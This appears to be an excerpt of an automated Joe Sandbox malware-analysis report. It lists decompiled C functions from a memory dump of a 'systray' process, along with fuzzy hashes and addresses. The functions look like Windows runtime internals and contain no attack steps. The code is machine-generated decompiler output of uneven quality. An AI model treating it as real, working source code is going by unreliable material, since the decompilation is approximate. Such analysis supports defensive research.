0x0465157f

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0c0c1c95a6e098fbbfaac3a37fe4a6c5154094b95c44f5ccb7a1ca6fb0fc6d
Instruction ID: 10525c9093b9c82b0cfa509865116362321e846863f7e6920c3b2196d6822869
Opcode Fuzzy Hash: fd0c0c1c95a6e098fbbfaac3a37fe4a6c5154094b95c44f5ccb7a1ca6fb0fc6d
Instruction Fuzzy Hash: 44018071A01258AFDB10DF68D841EAEB7B8EF85700F00405AB905EB280E674EE00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0465138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0465138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x468d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E045DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E045B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0465138a
0x0465138a
0x04651399
0x046513a3
0x046513a8
0x046513aa
0x046513b5
0x046513bb
0x046513c3
0x046513c6
0x046513c9
0x046513d4
0x046513e6
0x046513d6
0x046513df
0x046513df
0x046513f1
0x046513f2
0x046513f4
0x046513f9
0x0465140e

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c70f6faac4acb6a31fb15197ac74aad881cb52898f405117b375051690c7a6
Instruction ID: ef45efde300369db1f6949696e6290ca9bac38d8269e25e5409505b2f12b988a
Opcode Fuzzy Hash: 10c70f6faac4acb6a31fb15197ac74aad881cb52898f405117b375051690c7a6
Instruction Fuzzy Hash: A6015271E00219AFDB14DFA9D841FAEB7B8FF85710F00416AB905EB380E674AE01D795

Uniqueness

Uniqueness Score: -1.00%

Function 04661074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04661074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0466165E(__ebx, 0x4688ae4, (__edx -  *0x4688b04 >> 0x14) + (__edx -  *0x4688b04 >> 0x14), __edi, __ecx, (__edx -  *0x4688b04 >> 0x14) + (__edx -  *0x4688b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0465AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E045B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0464FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04661074
0x04661080
0x04661082
0x0466108a
0x0466108f
0x04661093
0x046610ab
0x046610ab
0x046610c3
0x046610cf
0x046610e1
0x046610d1
0x046610da
0x046610da
0x046610e9
0x046610f5
0x046610f5
0x046610fe

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98405792b9e7b1bcd7d965144566c4ff2e65ca6445b9778d9bc434e56e1d7735
Instruction ID: 4e20d45414e944ef693ba1b55a3e388bf78bcfc7a4318cd3d3a603ffce21e83c
Opcode Fuzzy Hash: 98405792b9e7b1bcd7d965144566c4ff2e65ca6445b9778d9bc434e56e1d7735
Instruction Fuzzy Hash: B9014772604781AFDB10EF68C900B5A77E5ABC4314F048A2DF886837A0FE30F940CB96

Uniqueness

Uniqueness Score: -1.00%

Function 045AB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E045B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04617016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x045ab037
0x045ab039
0x045ab03b
0x045ab040
0x045fa60e
0x00000000
0x00000000
0x045fa61d
0x045ab04b
0x045ab04e
0x045fa627
0x045fa634
0x00000000
0x00000000
0x045fa641
0x045fa653
0x045fa643
0x045fa64c
0x045fa64c
0x045fa65b
0x00000000
0x00000000
0x00000000
0x045fa66c
0x045ab057
0x045ab057
0x045ab057
0x045ab046
0x045ab046
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 661f424eed707f43ac23cf7c33ee131c130483d15bde03d59ddcd3b39fdb0718
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 34018471700580DFD322C75CD944F6A77E8FB45754F0944A1FB19CB651E628FC40E662

Uniqueness

Uniqueness Score: -1.00%

Function 0464FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0464FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x468d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E045DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E045B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0464fe3f
0x0464fe3f
0x0464fe4e
0x0464fe58
0x0464fe5d
0x0464fe5f
0x0464fe6a
0x0464fe72
0x0464fe75
0x0464fe78
0x0464fe83
0x0464fe95
0x0464fe85
0x0464fe8e
0x0464fe8e
0x0464fea0
0x0464fea1
0x0464fea3
0x0464fea8
0x0464febd

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4a62be2eaf847936e5582473327e9b18529cad76efa8e585e32394f66820f4
Instruction ID: 71e57108306b2f9fe80e32355320ddae2fda4a536ead133b0db7b36b0c215288
Opcode Fuzzy Hash: 7e4a62be2eaf847936e5582473327e9b18529cad76efa8e585e32394f66820f4
Instruction Fuzzy Hash: BB018871E00219BFDB14DF69D845FAEB7B8EF84704F00406AB9019B381E974AA01D795

Uniqueness

Uniqueness Score: -1.00%

Function 0464FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0464FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x468d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E045DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E045B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0464fec0
0x0464fec0
0x0464fecf
0x0464fed9
0x0464fede
0x0464fee0
0x0464feeb
0x0464fef3
0x0464fef6
0x0464fef9
0x0464ff04
0x0464ff16
0x0464ff06
0x0464ff0f
0x0464ff0f
0x0464ff21
0x0464ff22
0x0464ff24
0x0464ff29
0x0464ff3e

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4842b560c6dd7410138a87363087a9c28ce5db3f19659ecb84c7be0b6c110c6c
Instruction ID: b37311bbf1593b5803e240fdcca80cd1f18a0ff3b4d07ed386b0c1e79520e422
Opcode Fuzzy Hash: 4842b560c6dd7410138a87363087a9c28ce5db3f19659ecb84c7be0b6c110c6c
Instruction Fuzzy Hash: A7018871E00219AFDB14DB69D845FAEBBB8EF85704F04406AB9019B380E974AD01D795

Uniqueness

Uniqueness Score: -1.00%

Function 04668ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04668ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x468d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E045B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04668ed6
0x04668ee5
0x04668eed
0x04668ef0
0x04668efa
0x04668f03
0x04668f0c
0x04668f15
0x04668f24
0x04668f27
0x04668f31
0x04668f43
0x04668f33
0x04668f3c
0x04668f3c
0x04668f4e
0x04668f4f
0x04668f51
0x04668f56
0x04668f69

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ac229e4f332717e957b2d74b7a75ead88e52f08f05e3913b3a2e0b537d9338
Instruction ID: 7e817d6c3a526d428e26a5c309132acc501d4271092b5b833db3c694578724c5
Opcode Fuzzy Hash: 03ac229e4f332717e957b2d74b7a75ead88e52f08f05e3913b3a2e0b537d9338
Instruction Fuzzy Hash: 03112170E012199FDB04DFA8D541BAEF7F4FF48300F0442AAE519EB382E634A940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0459B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0459B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E045B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E045B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04617016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0459b1e8
0x0459b1ea
0x0459b1f3
0x045f4a17
0x0459b1f9
0x0459b1f9
0x0459b1f9
0x0459b201
0x045f4a21
0x045f4a2e
0x00000000
0x00000000
0x045f4a3b
0x045f4a4d
0x045f4a3d
0x045f4a46
0x045f4a46
0x045f4a55
0x00000000
0x00000000
0x00000000
0x0459b20a
0x0459b20a
0x0459b20a
0x0459b20a

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 5d90c2f551604f2976fd564471e5613622639797684f89cc2b154c2fa6806327
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 9901D632200680AFEB26975DEC04F6A7BD9FF92754F080461FA558B6B1E778FC00E215

Uniqueness

Uniqueness Score: -1.00%

Function 0462FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0462FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x468d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E045B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0462fe96
0x0462fe9e
0x0462fea1
0x0462fead
0x0462feb3
0x0462feb9
0x0462fec3
0x0462fed5
0x0462fec5
0x0462fece
0x0462fece
0x0462fee0
0x0462fee1
0x0462fee3
0x0462fee8
0x0462fefb

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1567efa6f17b507d990e02208d3a2246737db51c22e15880852a81f9d61ba21a
Instruction ID: bada91dbcf90bca71e5fee8c985ba753a2df24b0473b3eb122882facd6b199dc
Opcode Fuzzy Hash: 1567efa6f17b507d990e02208d3a2246737db51c22e15880852a81f9d61ba21a
Instruction Fuzzy Hash: 8E016270A00219AFCB14DFA8D541A6EB7F4FF48304F104159A545DB382E635E901DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04668F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04668F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x468d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E045B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04668f6a
0x04668f79
0x04668f81
0x04668f84
0x04668f8b
0x04668f91
0x04668f94
0x04668f9e
0x04668fb0
0x04668fa0
0x04668fa9
0x04668fa9
0x04668fbb
0x04668fbc
0x04668fbe
0x04668fc3
0x04668fd6

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90fea1aeae694e12dd541f06992bec165840950755d692eb8dc96ddd0f5e5aa
Instruction ID: da4357de5857afeeac819480f42f3c9a1b5a4baf392576224e89062ea69f1cce
Opcode Fuzzy Hash: c90fea1aeae694e12dd541f06992bec165840950755d692eb8dc96ddd0f5e5aa
Instruction Fuzzy Hash: FB014F74A0120DAFDB00EFB8D545AAEB7F4FF48300F10445AB905EB380EA74EA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0465131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0465131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x468d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E045B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0465131b
0x0465132a
0x04651330
0x04651336
0x0465133e
0x04651341
0x04651344
0x0465134f
0x04651361
0x04651351
0x0465135a
0x0465135a
0x0465136c
0x0465136d
0x0465136f
0x04651374
0x04651387

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b49e7ae356d401af425dd40d8e4d28df20f52fe1d2b20f9f606e74a2e4572db
Instruction ID: 978838e89635a329c2cd2361f880cf9a7ddecc3c024a64d1060981bda83160cb
Opcode Fuzzy Hash: 8b49e7ae356d401af425dd40d8e4d28df20f52fe1d2b20f9f606e74a2e4572db
Instruction Fuzzy Hash: AE013C71E0120DAFDB04EFA9D545AAEB7F4FF48700F00406ABD45EB391E634AA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 045BC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E045BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E046688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x045bc577
0x045bc57d
0x045bc581
0x045bc5b5
0x045bc5b9
0x045bc5ce
0x045bc5ce
0x045bc5ca
0x00000000
0x045bc5ca
0x045bc5c4
0x045bc5c8
0x00000000
0x00000000
0x00000000
0x045bc5ad
0x00000000
0x045bc5af

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39489b12eaf8dd47fd1a0eda2efeeedb4127cbb1d7d5079cbe4102d7b3e5ce5
Instruction ID: 5ae0a0dcf720ff2b2d871348b2e04a3696dfc8289cb635a9fccfdd9a93bfc228
Opcode Fuzzy Hash: b39489b12eaf8dd47fd1a0eda2efeeedb4127cbb1d7d5079cbe4102d7b3e5ce5
Instruction Fuzzy Hash: A3F0F0B29126908EE7338F24A004BA27BD4BB06370F44C86ED58687281C6A0F880E2D8

Uniqueness

Uniqueness Score: -1.00%

Function 04652073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04652073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0464FD22(__ecx);
				_t19 =  *0x468849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4688748; // 0x0
					if(__eflags <= 0) {
						E04651C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4688724 & 0x00000004;
							if(( *0x4688724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4688724; // 0x0
					return E04648DF1(__ebx, 0xc0000374, 0x4685890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04652076
0x04652078
0x0465207d
0x04652083
0x046520a4
0x046520aa
0x046520ac
0x046520b7
0x046520ba
0x046520bc
0x046520c9
0x046520c9
0x046520d0
0x046520d2
0x00000000
0x046520d2
0x046520be
0x046520c3
0x046520c5
0x046520c7
0x00000000
0x00000000
0x046520c7
0x046520bc
0x046520d4
0x04652085
0x04652085
0x046520a3
0x046520a3

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f089b4e706f2efd4a6622a3366c0d9bd8be1e049f4dbcf2184bcf6f807d359cb
Instruction ID: 383a51a22000eb433339beb76b4ab891a662a8bb0a216bad91ee1b27a937b091
Opcode Fuzzy Hash: f089b4e706f2efd4a6622a3366c0d9bd8be1e049f4dbcf2184bcf6f807d359cb
Instruction Fuzzy Hash: AEF0206A8131845AEF3A7F2521203E53BA0C7A9118F4A25CEDC9027310F63DAC83CE24

Uniqueness

Uniqueness Score: -1.00%

Function 04668D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04668D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x468d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E045B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04668d34
0x04668d43
0x04668d4b
0x04668d4e
0x04668d52
0x04668d5c
0x04668d6e
0x04668d5e
0x04668d67
0x04668d67
0x04668d79
0x04668d7a
0x04668d7c
0x04668d81
0x04668d94

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03eccf9ac8656b0a42788fe4894839c5c2e33c88f3d1301461639020decb00d7
Instruction ID: 470b85a972b9dc5af30d03b50b7d04a4ab889e118a1d0df977d9f0d622d99cf9
